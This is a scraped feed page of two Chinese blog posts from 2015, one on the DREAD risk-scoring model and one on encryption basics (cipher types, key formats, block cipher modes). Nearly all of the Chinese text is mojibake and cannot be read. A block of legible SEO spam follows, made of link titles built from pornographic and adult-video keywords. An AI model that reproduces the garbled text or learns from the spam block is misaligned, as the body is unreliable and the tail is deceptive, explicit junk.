鏁版嵁鍙楀埌濞佽儊灝卞彲鑳介犳垚鎹熷け錛屼絾鎹熷け鏈夊ぇ鏈夊皬錛屽▉鑳佸彂鐢熺殑姒傜巼涔熸湁楂樻湁浣庯紝鎴戜滑瑕佺粨鍚堝叿浣撴儏鍐墊潵瀵歸闄╁仛鍑哄垽鏂傛湁涓涓彨DREAD鐨勬ā鍨嬶紝鍙互鎸囧鎴戜滑濡備綍鍒ゆ柇濞佽儊鐨勯闄╃▼搴︺?/p>

姣忎竴涓洜绱犻兘鍒嗛珮銆佷腑銆佷綆涓変釜絳夌駭錛屾潈閲嶅煎垎鍒負(fù)3銆?銆?銆?/p>

褰撴湁涓涓▉鑳佹椂錛屾垜浠皢瀹冨湪姣忎竴涓洜绱犱腑鐨勬潈閲嶅肩浉鍔狅紝鍗沖彲寰楀嚭椋庨櫓緋繪暟銆?/p>

鍋囧鎴戜滑瀵歸闄╃郴鏁拌寖鍥寸殑瀹氫箟濡備笅錛?/p>

楂樺嵄錛?2~15鍒嗭紝涓嵄錛?~11鍒嗭紝浣庡嵄錛?~7鍒嗐?/p>

閭e鏋滀互浣跨敤鏄庢枃淇濆瓨瀵嗙爜涓轟緥錛岄闄╃郴鏁板彲鑳藉儚涓嬮潰榪欐牱璁$畻錛?/p>

椋庨櫓 = D(3) + R(1) + E(1) + A(3) + D(1) = 9鍒嗭紝榪欏氨鏄竴涓腑鍗遍闄┿?/p>

鍚庣畫瀵瑰▉鑳佺殑澶勭悊錛屽簲褰撴牴鎹闄╃殑澶у皬鍜屼慨澶嶇殑闅炬槗紼嬪害鍋氬嚭騫寵 銆?br />
寰俊璁㈤槄鍙鳳細(xì)
婧愭枃鍦板潃錛?a title="http://blog.gopersist.com/2015/04/17/web-security-2/">http://blog.gopersist.com/2015/04/17/web-security-2/



鑰佹灄 2015-04-17 23:47 鍙戣〃璇勮
]]>Web瀹夊叏鎶鏈?1)-瀵瑰姞瀵嗘満鍒剁殑鐞嗚Вhttp://www.tkk7.com/linli/archive/2015/04/13/424381.html鑰佹灄鑰佹灄Mon, 13 Apr 2015 13:51:00 GMThttp://www.tkk7.com/linli/archive/2015/04/13/424381.htmlhttp://www.tkk7.com/linli/comments/424381.htmlhttp://www.tkk7.com/linli/archive/2015/04/13/424381.html#Feedback0http://www.tkk7.com/linli/comments/commentRss/424381.htmlhttp://www.tkk7.com/linli/services/trackbacks/424381.html鍔犲瘑綆楁硶

鏁版嵁鍔犲瘑綆楁硶鏈夊縐板姞瀵嗐侀潪瀵圭О鍔犲瘑鍜屼俊鎭憳瑕佷笁綾匯?/p>

瀵圭О鍔犲瘑鏄嬌鐢ㄥ崟涓瘑閽ュ鏁版嵁榪涜鍔犲瘑鍜岃В瀵嗐傛湁DES銆丄ES銆丷C-5絳夌畻娉曘?/p>

闈炲縐板姞瀵嗘槸浣跨敤涓瀵瑰瘑閽?鍏挜鍜岀閽?瀵規(guī)暟鎹繘琛屽姞瀵嗗拰瑙e瘑銆傛湁RSA銆丒CC絳夌畻娉曘傞潪瀵圭О鍔犲瘑澶ф姣斿縐板姞瀵嗘參100鍊嶄互涓娿?/p>

閫氬父鐨勭敤娉曞涓嬶細(xì)

  1. 浣跨敤鍏挜鍔犲瘑鏁版嵁錛屼嬌鐢ㄧ閽ヨВ瀵嗘暟鎹?/li>
  2. 浣跨敤縐侀挜絳懼悕鏁版嵁錛屼嬌鐢ㄥ叕閽ラ獙璇佺鍚嶃?/li>

淇℃伅鎽樿濡傛灉涔熺畻鍔犲瘑綆楁硶鐨勮瘽錛屽畠鐨勫姞瀵嗚繃紼嬩笉闇瑕佸瘑閽ワ紝騫朵笖緇忚繃鍔犲瘑鐨勬暟鎹棤娉曡瑙e瘑錛屽畠鏄牴鎹笉瀹氶暱鐨勬槑鏂囪綆楀緱鍒頒竴孌靛畾闀跨殑鏁版嵁銆傛湁MD5銆丼HA1絳夌畻娉曘?/p>

瀵嗛挜瑙勮寖

瑙勮寖澶錛岀綉涓婅寰楀緢涔憋紝鎸戝父鐢ㄧ殑鎸夋垜鐨勭悊瑙e垪涓涓嬨?/p>

瀵嗛挜鏍煎紡錛?/h4>
  1. X.509錛氶氱敤鐨勮瘉涔︽牸寮忥紝鍖呮嫭鍏挜淇℃伅銆佺敤鎴鋒爣璇嗐佺鍙戜俊鎭瓑銆?/li>
  2. PKCS緋葷粺鏍囧噯錛氱編鍥絉SA鏁版嵁瀹夊叏鍏徃鍙婂叾鍚堜綔浼欎即鍒跺畾鐨勪竴緇勫叕閽ュ瘑鐮佸鏍囧噯銆傚叾涓璓KCS#8鎻忚堪縐佹湁瀵嗛挜鐨勪俊鎭牸寮忥紝鍖呮嫭縐侀挜鍙婂彲閫夌殑灞炴ч泦絳夈?/li>

瀵嗛挜瀛樺偍錛?/h4>
  1. DER錛氫簩榪涘埗緙栫爜銆?/li>
  2. PEM錛欰SCII緙栫爜銆?/li>

鍔犲瘑妯″紡

鍧楀瘑鐮佽嚜韜彧鑳藉姞瀵嗛暱搴︾瓑浜庡瘑鐮佸潡闀垮害鐨勫崟鍧楁暟鎹紝鑻ヨ瀵瑰彉闀挎暟鎹繘琛屽姞瀵嗭紝鍒欏繀欏諱簨鍏堝皢鏁版嵁榪涜鍒囧垎錛岃屼笖鏈鍚庝竴涓暟鎹潡闇瑕侀傚綋鐨勫~鍏呮柟寮忔墿灞曞埌瀵嗙爜鍧楃殑闀垮害銆傚姞瀵嗘ā寮忓嵆鍧楀瘑鐮佺殑宸ヤ綔妯″紡錛屽氨鏄嬌鐢ㄨ繖浜涙柟寮忕敤鍚屼竴涓瘑閽ュ澶氫簬涓鍧楃殑鏁版嵁榪涜鍔犲瘑銆?/p>

鍔犲瘑妯″紡閫氬父鐢ㄤ簬瀵圭О鍔犲瘑錛屼篃鍙互鐢ㄤ簬闈炲縐板姞瀵嗐備絾闈炲縐板姞瀵嗛氬父涓嶉傚悎鍔犲瘑杈冮暱鐨勪俊鎭紝鎵浠ヤ細(xì)浣跨敤娣峰悎鍔犲瘑浠f浛銆?/p>

ps: 浠SA鍜孌ES涓轟緥錛屾販鍚堝姞瀵嗛氬父浣跨敤DES鍏堝姞瀵嗘槑鏂囷紝鍐嶄嬌鐢≧SA鐨勫叕閽ュ姞瀵咲ES鐨勫瘑閽ワ紝鍐嶅皢2涓瘑鏂囦竴璧蜂紶閫掑嚭鍘匯傛帴鏀舵柟浣跨敤RSA鐨勭閽ヨВ瀵咲ES鐨勫瘑閽ヤ俊鎭紝鍐嶄嬌鐢―ES鐨勫瘑閽ヨВ瀵嗗叿浣撳唴瀹廣?/em>

鏈綆鍗曠殑鍔犲瘑妯″紡鏄疎CB錛堝嵆鐢?shù)瀛愬瘑鐮佹湰锛夈傚叾浠栬繕鏈塁BC銆丳CBC銆丆FB絳夈?/p>

ECB鍜孋BC闇瑕佸鏈鍚庝竴鍧楄繘琛屽~鍏咃紝濉厖鏂規(guī)硶鏈夊緢澶氱錛屾渶綆鍗曠殑鏄厛鍦ㄦ槑鏂囩殑鏈鍚庡~鍏呯┖瀛楃錛屼嬌鏄庢枃闀垮害涓哄瘑鐮佸潡闀垮害鐨勬暣鏁板嶃?br />
寰俊璁㈤槄鍙鳳細(xì)
婧愭枃鍦板潃錛?a >http://blog.gopersist.com/2015/04/08/crypto/



鑰佹灄 2015-04-13 21:51 鍙戣〃璇勮
]]> 主站蜘蛛池模板: 久久国产成人精品国产成人亚洲| 亚洲卡一卡2卡三卡4卡无卡三| 欧亚一级毛片免费看| 亚洲一区二区三区在线视频 | 大桥未久亚洲无av码在线| 亚洲AV永久无码精品一区二区国产 | 亚洲精品尤物yw在线影院| 一级毛片不卡片免费观看| 亚洲精品无码专区久久| 亚洲欧洲成人精品香蕉网| 免费看国产精品3a黄的视频| 免费大片av手机看片| 亚洲国产精品线观看不卡| 亚洲精品无码永久在线观看| 又黄又爽又成人免费视频| 一区二区在线免费视频| 99热亚洲色精品国产88| 亚洲人成77777在线播放网站| 免费的一级片网站| 久久久久久国产精品免费无码| 精品一区二区三区免费毛片| 亚洲理论精品午夜电影| 亚洲男同帅GAY片在线观看| 卡1卡2卡3卡4卡5免费视频 | 午夜电影免费观看| 99免费在线观看视频| 一区二区免费在线观看| 丁香婷婷亚洲六月综合色| 日韩亚洲AV无码一区二区不卡 | 亚洲人成在线播放| 亚洲AV永久无码精品| 免费一级毛片在播放视频| 成人女人A级毛片免费软件| 四虎影视成人永久免费观看视频| 美女被爆羞羞网站在免费观看| 性xxxx黑人与亚洲| 亚洲视频免费播放| 亚洲综合一区二区精品导航| 国产亚洲精品a在线观看| 亚洲AⅤ无码一区二区三区在线| 成年女人午夜毛片免费看|